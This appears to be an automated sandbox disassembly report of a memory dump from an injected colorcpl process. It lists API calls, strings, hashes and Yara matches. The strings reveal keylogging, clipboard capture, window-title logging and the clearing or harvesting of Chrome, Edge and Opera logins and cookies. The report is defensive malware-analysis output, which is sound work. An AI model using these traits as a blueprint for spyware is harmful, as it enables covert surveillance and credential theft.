                                                          • API String ID: 1818849710-4028850238
                                                          • Opcode ID: 9e1aa22d1bda7590d1a3106f4d832b50f2195d733351773e48dcb8729ba6e652
                                                          • Instruction ID: c31cde0ed4924e7519013a8116ac6ce49d0afcf638318c662b5551e8340d72f7
                                                          • Opcode Fuzzy Hash: 9e1aa22d1bda7590d1a3106f4d832b50f2195d733351773e48dcb8729ba6e652
                                                          • Instruction Fuzzy Hash: F5F0CDB298011CFBDF00AFB0EC45FEA772CEF00B90F004564FA069A000EB719A14CBA0
                                                          APIs
                                                          • ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 02FA616B
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ExecuteShell
                                                          • String ID: /C $cmd.exe$open
                                                          • API String ID: 587946157-3896048727
                                                          • Opcode ID: b5f79ecbd7760bcdacf3066085a200a540a26d357bf888c6fa7f44f352b51527
                                                          • Instruction ID: ba9bbeaef70a6b6219d540d6faa9bf74c51198ef4913678df0c0f0831df46673
                                                          • Opcode Fuzzy Hash: b5f79ecbd7760bcdacf3066085a200a540a26d357bf888c6fa7f44f352b51527
                                                          • Instruction Fuzzy Hash: 2AE0C0B16443096AFA45F664CCA4DAFB3AEAE507C4B400C2DB357920A1EF649909CE55
                                                          APIs
                                                          • TerminateThread.KERNEL32(Function_0000A2B8,00000000,030052F0,pth_unenc,02F9D0F3,030052D8,030052F0,?,pth_unenc), ref: 02F9B8F6
                                                          • UnhookWindowsHookEx.USER32(030050F0), ref: 02F9B902
                                                          • TerminateThread.KERNEL32(02F9A2A2,00000000,?,pth_unenc), ref: 02F9B910
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: TerminateThread$HookUnhookWindows
                                                          • String ID: pth_unenc
                                                          • API String ID: 3123878439-4028850238
                                                          • Opcode ID: c5e6edb9afea8ccc736581c73af83ecc0dda8cd87c802c60cd83f14a98c96d2d
                                                          • Instruction ID: 2a511a6e11e59dca11ebc98feeb08bdb7f1a834faa50e3ce69189feea5b8f913
                                                          • Opcode Fuzzy Hash: c5e6edb9afea8ccc736581c73af83ecc0dda8cd87c802c60cd83f14a98c96d2d
                                                          • Instruction Fuzzy Hash: EDE01272A44319EFFF615F90A8988A5BBADEA051D9314092DF3C246525C6B14C50C760
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: __alldvrm$_strrchr
                                                          • String ID:
                                                          • API String ID: 1036877536-0
                                                          • Opcode ID: 70c324bd787235ec34b4410bef6e6c487e79153caf11c4279a27308c3ab035ac
                                                          • Instruction ID: cc0ff7e65d9bd1627f8fa059cc8f702c8c774bb9aa79e4400d1e157d3aeda6ef
                                                          • Opcode Fuzzy Hash: 70c324bd787235ec34b4410bef6e6c487e79153caf11c4279a27308c3ab035ac
                                                          • Instruction Fuzzy Hash: 24A14A72E007869FEB128F28CC817ADBBE7EF51394F2C41ADD6559B281D3358941CB58
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 94be7c1a80cb6ddcbdc91585dca4124af392995551df31f04f9d6c51b55eb610
                                                          • Instruction ID: 15faf1559d442142589fb0594639bcd080adc347becba9fdf5aca82a0812bf17
                                                          • Opcode Fuzzy Hash: 94be7c1a80cb6ddcbdc91585dca4124af392995551df31f04f9d6c51b55eb610
                                                          • Instruction Fuzzy Hash: A6413972A40704AFE725AF78CC40F6EBBEBEB88750F14452EE616DB281D77195018BD0
                                                          APIs
                                                          Strings
                                                          • Cleared browsers logins and cookies., xrefs: 02F9C130
                                                          • [Cleared browsers logins and cookies.], xrefs: 02F9C11F
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Sleep
                                                          • String ID: [Cleared browsers logins and cookies.]$Cleared browsers logins and cookies.
                                                          • API String ID: 3472027048-1236744412
                                                          • Opcode ID: 6ab8403c915d555f9babaac675ce6b5ab823d3768edc7e8dbb6d646549109330
                                                          • Instruction ID: 190463538caee1c258609b808f81f111443049638b1b23d477c611a0430f8089
                                                          • Opcode Fuzzy Hash: 6ab8403c915d555f9babaac675ce6b5ab823d3768edc7e8dbb6d646549109330
                                                          • Instruction Fuzzy Hash: ED31F925B4D3806EFE11BBB458257AA7F830F57AC8F08845EEBD5573A2CA52440C8B63
                                                          APIs
                                                            • Part of subcall function 02FAC5E2: GetForegroundWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 02FAC5F2
                                                            • Part of subcall function 02FAC5E2: GetWindowTextLengthW.USER32(00000000), ref: 02FAC5FB
                                                            • Part of subcall function 02FAC5E2: GetWindowTextW.USER32(00000000,00000000,00000001), ref: 02FAC625
                                                          • Sleep.KERNEL32(000001F4), ref: 02F9A5AE
                                                          • Sleep.KERNEL32(00000064), ref: 02F9A638
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Window$SleepText$ForegroundLength
                                                          • String ID: [ $ ]
                                                          • API String ID: 3309952895-93608704
                                                          • Opcode ID: 2aac33eb4453b9649a6fe27f22f7cb311751d9aed7e6f0f72b5b8c96a9546332
                                                          • Instruction ID: 6d689e2ebb0f9ac4a20b688cecdd9948ca8d2170aadacd52b40030b738be6ba0
                                                          • Opcode Fuzzy Hash: 2aac33eb4453b9649a6fe27f22f7cb311751d9aed7e6f0f72b5b8c96a9546332
                                                          • Instruction Fuzzy Hash: 1911D232A042045BEE14FB74CC11A6FB7AAAF603C4F40042DE756562E1FF61EA09CF92
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: f2fbe3181a9c411838e30296e166797c8b4dd5e435d8a4633b86fc4e2e0858fc
                                                          • Instruction ID: 340e969e981ae1f518ebaba16c196eb9cc176370d8a579055c7784ca37fdfee8
                                                          • Opcode Fuzzy Hash: f2fbe3181a9c411838e30296e166797c8b4dd5e435d8a4633b86fc4e2e0858fc
                                                          • Instruction Fuzzy Hash: FD01A7B2B092197EEB2139786CC0F67B64FDF417FCB290765F321651C0DB618C404A61
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: a44627445dfa42a32885d9676af2e6fb15ab6950c8a543e6103c27763034fcfd
                                                          • Instruction ID: 192759680bde0bc433a17cf6a507aebced222c4fdc0b4c69995b754db832fb56
                                                          • Opcode Fuzzy Hash: a44627445dfa42a32885d9676af2e6fb15ab6950c8a543e6103c27763034fcfd
                                                          • Instruction Fuzzy Hash: 3101A2B2A092167EAB2129796CC0D27B64FEF413F932D07A6F721951D4DF608C044A62
                                                          APIs
                                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,02FD858D,00000000,00000000,00000000,00000000,?,02FD88B9,00000006,FlsSetValue), ref: 02FD8618
                                                          • GetLastError.KERNEL32(?,02FD858D,00000000,00000000,00000000,00000000,?,02FD88B9,00000006,FlsSetValue,02FEF170,02FEF178,00000000,00000364,?,02FD8367), ref: 02FD8624
                                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,02FD858D,00000000,00000000,00000000,00000000,?,02FD88B9,00000006,FlsSetValue,02FEF170,02FEF178,00000000), ref: 02FD8632
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          • API ID: LibraryLoad$ErrorLast
                                                          • String ID:
                                                          • API String ID: 3177248105-0
                                                          • Opcode ID: ab2a43bcd0ade568fd203fd4cb508baf2495bf4ff6ede3d794c65372bd5105d5
                                                          • Instruction ID: 63ccb72ae9fb6de0d805551fadd4619a31ddc114b489b0bb183af165b9ee792d
                                                          • Opcode Fuzzy Hash: ab2a43bcd0ade568fd203fd4cb508baf2495bf4ff6ede3d794c65372bd5105d5
                                                          • Instruction Fuzzy Hash: 5401F73AB46226EBCF229A78DC44A57B759AF04BF1B190924FB06D7140D720DC12CEF4
                                                          APIs
                                                          • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,02F9A87E), ref: 02FAC52F
                                                          • GetFileSize.KERNEL32(00000000,00000000), ref: 02FAC543
                                                          • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02FAC568
                                                          • CloseHandle.KERNEL32(00000000), ref: 02FAC576
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          • API ID: File$CloseCreateHandleReadSize
                                                          • String ID:
                                                          • API String ID: 3919263394-0
                                                          • Opcode ID: 338b14e7afacd9c851ff0bd5de6249bc9a5ce03b85c34e7a3717ba9d3ccc829c
                                                          • Instruction ID: 78bcd4b626b8c4024a30f253441320819b98c0f9f1aca553d212a6e09d3c9752
                                                          • Opcode Fuzzy Hash: 338b14e7afacd9c851ff0bd5de6249bc9a5ce03b85c34e7a3717ba9d3ccc829c
                                                          • Instruction Fuzzy Hash: 2BF0C2B1A4120CBFEB111A25AD94FBB76ADDB876E4F000A2AFA01A2280DA614D054531
                                                          APIs
                                                          • OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 02FAC286
                                                          • OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 02FAC299
                                                          • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 02FAC2C4
                                                          • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 02FAC2CC
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          • API ID: CloseHandleOpenProcess
                                                          • String ID:
                                                          • API String ID: 39102293-0
                                                          • Opcode ID: f6c5fa4af5a1f0fd7914cce2d575fc7cd4ea2481121967153c56ffeead18ef12
                                                          • Instruction ID: d57d739f6c15ddfb8d38b0d818960412543f663312f2c152ff0f75625c6fa409
                                                          • Opcode Fuzzy Hash: f6c5fa4af5a1f0fd7914cce2d575fc7cd4ea2481121967153c56ffeead18ef12
                                                          • Instruction Fuzzy Hash: 280149B2640219AFEB1266E49C49F77B6BCCB80FC1F000127FB04D3181EFA08D414A71
                                                          APIs
                                                          • ___BuildCatchObject.LIBVCRUNTIME ref: 02FC98FA
                                                            • Part of subcall function 02FC9F32: ___AdjustPointer.LIBCMT ref: 02FC9F7C
                                                          • _UnwindNestedFrames.LIBCMT ref: 02FC9911
                                                          • ___FrameUnwindToState.LIBVCRUNTIME ref: 02FC9923
                                                          • CallCatchBlock.LIBVCRUNTIME ref: 02FC9947
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
                                                          • String ID:
                                                          • API String ID: 2633735394-0
                                                          • Opcode ID: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
                                                          • Instruction ID: 1277287399e87b78c37bdcf551561318c1152f0f9bcc4004f43bc1acc5fd7a8f
                                                          • Opcode Fuzzy Hash: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
                                                          • Instruction Fuzzy Hash: 06010C3240014ABBCF125F55CE00EEA3BBAFF89794F258118FA5865120C3B6E571DFA0
                                                          APIs
                                                          • GetSystemMetrics.USER32(0000004C), ref: 02FA942B
                                                          • GetSystemMetrics.USER32(0000004D), ref: 02FA9431
                                                          • GetSystemMetrics.USER32(0000004E), ref: 02FA9437
                                                          • GetSystemMetrics.USER32(0000004F), ref: 02FA943D
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          • API ID: MetricsSystem
                                                          • String ID:
                                                          • API String ID: 4116985748-0
                                                          • Opcode ID: 27d1ea399e0f1e7458d00e0effe522ffba7cb86061e46663a9038dc8a9624ea2
                                                          • Instruction ID: 14df62d992b9e0867a8ff061b4e98a4b215dd0acd2147275188d1c8824f97baf
                                                          • Opcode Fuzzy Hash: 27d1ea399e0f1e7458d00e0effe522ffba7cb86061e46663a9038dc8a9624ea2
                                                          • Instruction Fuzzy Hash: EFF044E2B043155BD701EE758C64A2B7AD69BC42E0F10887EEB198B381EEE4DC058B91
                                                          APIs
                                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 02F94066
                                                            • Part of subcall function 02FABA09: GetCurrentProcessId.KERNEL32(00000000,75923530,00000000,?,?,?,?,02FF6478,02F9D248,.vbs,?,?,?,?,?,030052F0), ref: 02FABA30
                                                            • Part of subcall function 02FA85A3: CloseHandle.KERNEL32(02F940F5,?,?,02F940F5,02FF5E84), ref: 02FA85B9
                                                            • Part of subcall function 02FA85A3: CloseHandle.KERNEL32(02FF5E84,?,?,02F940F5,02FF5E84), ref: 02FA85C2
                                                            • Part of subcall function 02FAC516: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,02F9A87E), ref: 02FAC52F
                                                          • Sleep.KERNEL32(000000FA,02FF5E84), ref: 02F94138
                                                          Strings
                                                          • /sort "Visit Time" /stext ", xrefs: 02F940B2
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          • API ID: CloseFileHandle$CreateCurrentModuleNameProcessSleep
                                                          • String ID: /sort "Visit Time" /stext "
                                                          • API String ID: 368326130-1573945896
                                                          • Opcode ID: 200a8ba8a4eb8c7ef3be7e00c1e4e36a8ef452e72bc59bc22c23c828fa0918bb
                                                          • Instruction ID: befa51ca3758cb141b329aae5b1562a9162da28f000c0b37999b8ab8a7d3e451
                                                          • Opcode Fuzzy Hash: 200a8ba8a4eb8c7ef3be7e00c1e4e36a8ef452e72bc59bc22c23c828fa0918bb
                                                          • Instruction Fuzzy Hash: B7314F31A1011D5AEF15FAB5DC94AEEB377AF90384F400069E70AA7190FF205E4ACE90
                                                          APIs
                                                            • Part of subcall function 02FC4801: __onexit.LIBCMT ref: 02FC4807
                                                          • __Init_thread_footer.LIBCMT ref: 02F9B7D2
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          • API ID: Init_thread_footer__onexit
                                                          • String ID: [End of clipboard]$[Text copied to clipboard]
                                                          • API String ID: 1881088180-3686566968
                                                          • Opcode ID: b0af32f9ac0f514032cc416562407846717dab3c395e3ea0da77704c8b45c2b2
                                                          • Instruction ID: 15c494a21fb25708afcbbcaef5da44aa2866636ebe12c560326c2f801a8293d1
                                                          • Opcode Fuzzy Hash: b0af32f9ac0f514032cc416562407846717dab3c395e3ea0da77704c8b45c2b2
                                                          • Instruction Fuzzy Hash: 29212D3191020D9AEF14FBA4EC90EEEB37AAF54794F50012AD71A67190EF21694ACE90
                                                          APIs
                                                          • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,02FE1E12,?,00000050,?,?,?,?,?), ref: 02FE1C92
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          • API ID:
                                                          • String ID: ACP$OCP
                                                          • API String ID: 0-711371036
                                                          • Opcode ID: 777b7683598938f172113edba7699c55a557f61a2208713a002dc7e65eef7635
                                                          • Instruction ID: 00fba24fed562497fdfd6da9e543ed6a2451122da43c895c5d5a7e62528ca5f4
                                                          • Opcode Fuzzy Hash: 777b7683598938f172113edba7699c55a557f61a2208713a002dc7e65eef7635
                                                          • Instruction Fuzzy Hash: 7B2190A2E00208A6DF368A5ECD41BEB72A6AB54FD5F568464EB0FD7204E732DD41D350
                                                          APIs
                                                          • GetLocalTime.KERNEL32(00000000), ref: 02FAB59A
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          • API ID: LocalTime
                                                          • String ID: | $%02i:%02i:%02i:%03i
                                                          • API String ID: 481472006-2430845779
                                                          • Opcode ID: 365919d6f7223bbb45bb5b4c0135af45285c19c67b4474f2e033c53a12f09631
                                                          • Instruction ID: 9385f16946c77cf4f4596218c6630623711607e5c6d3a60df55853f86b591c80
                                                          • Opcode Fuzzy Hash: 365919d6f7223bbb45bb5b4c0135af45285c19c67b4474f2e033c53a12f09631
                                                          • Instruction Fuzzy Hash: FD1193714082095AEB04FB65DC509FFB3E9AF44384F50092EF699C21D0EF34DA48CB92
                                                          APIs
                                                            • Part of subcall function 02F9B19F: GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 02F9B1AD
                                                            • Part of subcall function 02F9B19F: wsprintfW.USER32 ref: 02F9B22E
                                                            • Part of subcall function 02FAB580: GetLocalTime.KERNEL32(00000000), ref: 02FAB59A
                                                          • CloseHandle.KERNEL32(?), ref: 02F9B0EF
                                                          • UnhookWindowsHookEx.USER32 ref: 02F9B102
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          • API ID: LocalTime$CloseHandleHookUnhookWindowswsprintf
                                                          • String ID: Online Keylogger Stopped
                                                          • API String ID: 1623830855-1496645233
                                                          • Opcode ID: 98305c69b96ca1e9c52fee2b6d936586c72e9c9e6a8359616cd0897c82375e13
                                                          • Instruction ID: ca5d4f1c91a46452ef7233452d105bc48c7602a6149ef27d4e80f7e255a3db99
                                                          • Opcode Fuzzy Hash: 98305c69b96ca1e9c52fee2b6d936586c72e9c9e6a8359616cd0897c82375e13
                                                          • Instruction Fuzzy Hash: BC01B135A00204ABFF21BB38DC0A7BEBBB69B41788F40045DDB4207595EB612896CFD2
                                                          APIs
                                                          • PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Google\Chrome\,00000000), ref: 02F9C531
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          • API ID: ExistsFilePath
                                                          • String ID: UserProfile$\AppData\Local\Google\Chrome\
                                                          • API String ID: 1174141254-4188645398
                                                          • Opcode ID: 04cdf0c9a897886d1b121810dfe62f77711fdc8915edfcfe1aa8779ea3c13eac
                                                          • Instruction ID: a60677dba90ac62480591e9d6c355360827ad8b38b99204f6cc8ddbe40d849bf
                                                          • Opcode Fuzzy Hash: 04cdf0c9a897886d1b121810dfe62f77711fdc8915edfcfe1aa8779ea3c13eac
                                                          • Instruction Fuzzy Hash: F4F08231A0021A97FE04B7B4DC068FF7B2D9D206D1B40012AE706A2291EF50D846CEE0
                                                          APIs
                                                          • PathFileExistsW.SHLWAPI(00000000,\Opera Software\Opera Stable\,00000000), ref: 02F9C5F7
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          • API ID: ExistsFilePath
                                                          • String ID: AppData$\Opera Software\Opera Stable\
                                                          • API String ID: 1174141254-1629609700
                                                          • Opcode ID: f20529ec6c1b61356cc1bbd00fd1f25209950c31450e7fb9622746ca511ee473
                                                          • Instruction ID: 4a3a20df3f10efbb1926a98772fca3952194db10bb29f00c4dcf60a7924f7dd2
                                                          • Opcode Fuzzy Hash: f20529ec6c1b61356cc1bbd00fd1f25209950c31450e7fb9622746ca511ee473
                                                          • Instruction Fuzzy Hash: 68F08231A4021997BE15FBB5DC468FF7B2D9D20AD1F000166E70AA2191EF509841CFE0
                                                          APIs
                                                          • PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Microsoft\Edge\,00000000), ref: 02F9C594
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          • API ID: ExistsFilePath
                                                          • String ID: UserProfile$\AppData\Local\Microsoft\Edge\
                                                          • API String ID: 1174141254-2800177040
                                                          • Opcode ID: cf40980a0b3df3a71f542f8066dd7ef94084368c680a8a969e88c867a0d384de
                                                          • Instruction ID: 13398c722025bfffa1d9f5f16c899d510b4c0d61e8aac72c24125a0e8ae5d001
                                                          • Opcode Fuzzy Hash: cf40980a0b3df3a71f542f8066dd7ef94084368c680a8a969e88c867a0d384de
                                                          • Instruction Fuzzy Hash: 2CF08231A0021A96FE04B6B5DC068FFBB2D9D106D5B400126A706A3190EF509846CEE0
                                                          APIs
                                                          • GetKeyState.USER32(00000011), ref: 02F9B686
                                                            • Part of subcall function 02F9A41B: GetForegroundWindow.USER32(?,?,030050F0), ref: 02F9A451
                                                            • Part of subcall function 02F9A41B: GetWindowThreadProcessId.USER32(00000000,?), ref: 02F9A45D
                                                            • Part of subcall function 02F9A41B: GetKeyboardLayout.USER32(00000000), ref: 02F9A464
                                                            • Part of subcall function 02F9A41B: GetKeyState.USER32(00000010), ref: 02F9A46E
                                                            • Part of subcall function 02F9A41B: GetKeyboardState.USER32(?,?,030050F0), ref: 02F9A479
                                                            • Part of subcall function 02F9A41B: ToUnicodeEx.USER32(03005144,?,?,?,00000010,00000000,00000000), ref: 02F9A49C
                                                            • Part of subcall function 02F9A41B: ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 02F9A4FC
                                                            • Part of subcall function 02F9A671: SetEvent.KERNEL32(?,?,00000000,02F9B245,00000000), ref: 02F9A69D
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          • API ID: State$KeyboardUnicodeWindow$EventForegroundLayoutProcessThread
                                                          • String ID: [AltL]$[AltR]
                                                          • API String ID: 2738857842-2658077756
                                                          • Opcode ID: a6f618f72f6957f08f1a0d743af187328588b77748698ada469278e4e947850f
                                                          • Instruction ID: 2fec663617cd021a637a0471046d7f14dc6ba8db35fab703daa6cbfe704395d2
                                                          • Opcode Fuzzy Hash: a6f618f72f6957f08f1a0d743af187328588b77748698ada469278e4e947850f
                                                          • Instruction Fuzzy Hash: 9AE09B31B0022017FC69763CBD3E6BD3E168F82AE4B41018DEB43CB6A4DD9559514FD6
                                                          APIs
                                                          • GetKeyState.USER32(00000012), ref: 02F9B6E0
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: State
                                                          • String ID: [CtrlL]$[CtrlR]
                                                          • API String ID: 1649606143-2446555240
                                                          • Opcode ID: 6f26d617b8653c2ac688b5ccdc78d4cc4dd04efebd3ffa79b8fe67134f902a2e
                                                          • Instruction ID: 83468d66d920ef5ccc315612e0e5463ef7932fac2978f288d82dba50b8efc15b
                                                          • Opcode Fuzzy Hash: 6f26d617b8653c2ac688b5ccdc78d4cc4dd04efebd3ffa79b8fe67134f902a2e
